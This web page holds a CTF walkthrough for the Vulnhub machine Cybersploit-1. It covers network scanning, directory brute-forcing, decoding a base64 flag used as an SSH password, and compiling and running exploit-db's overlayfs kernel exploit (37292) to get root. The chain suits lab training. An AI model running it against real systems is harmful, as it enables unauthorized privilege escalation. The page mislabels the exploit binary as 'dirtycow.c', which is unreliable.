CTF Walk Through | HackProof Academy | [email protected]

2 subscriber(s)


01/12/2024 Shad Hussain Knowledge Views 278 Comments 0 Analytics Video English DMCA Add Favorite Copy Link
CTF Walk Through - Cybersploit-1 - Vulnhub

machine link : https://www.vulnhub.com/entry/cybersploit-1,506/ step1 : USE netdiscover or arp-scan -l ------ to get the ip of the machine from the network step2 : USE nmap -T4 -sCV -p- 192.168.0.103 -vv -Pn ------ to get the open ports of the machine FINDING : port 80 http is open port 22 ssh is open ssh version OpenSSH 5.9p1 step3 : open the ip in the browser ------the site will open step4 : explore the site and view the sourse ------ at the bottom you will get the user name itsskv step5 : RUN gobuster dir -u http://192.168.0.103 -w /usr/share/wordlists/dirbuster/directory-list- 2.3- medium.txt ------ you will get a /robots file open it ------ http://192.168.0.103/robots - ----- you will get a hash R29vZCBXb3JrICEKRmxhZzE6IGN5YmVyc3Bsb2l0e3lvdXR1YmUuY29tL2MvY3liZXJzcGxvaXR9 step6 : OPEN http://hashes.com or and https://www.base64decode.org/ ------ to crack the hash ------ you will get the result Flag1: cybersploit{youtube.com/c/cybersploit} step7 : login with ------ ssh [email protected] -p 22 ------ with pwd : cybersploit{youtube.com/c/cybersploit} step8 : Inside ssh use whoami to find the user name ------ you will get ------ itsskv@cybersploit- CTF:~$ step9 : Use command uname -r ------ to find the kernel version ------ you will get ------ 3.13.0-32- generic step10: Open new terminal and type ------ searchsploit 3.13.0 ------ to find the exploit name ------ you will get ------ Linux Kernel 3.13.0 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - overlayfs Local Privilege | linux/local/37292.c ------ search it google step11: In here https://www.exploit-db.com/exploits/37292 step12: In existing ssh cd /home/itsskv and vi exploit.c ------it will open text editor step13: press i to enter and paste the exploit code , hit enter key and press esc key and press :wq and hit enter and check with ls step14: Now compile the exploit with gcc exploit.c -o dirtycow.c -pthread and after that chmod +x dirtycow.c and then run the exploit with ./dirtycow.c step15: Now write command whoami if all went good you will be root

Related articles

 WhatsApp no. else use your mail id to get the otp...!    Please tick to get otp in your mail id...!
 





© mutebreak.com | All Rights Reserved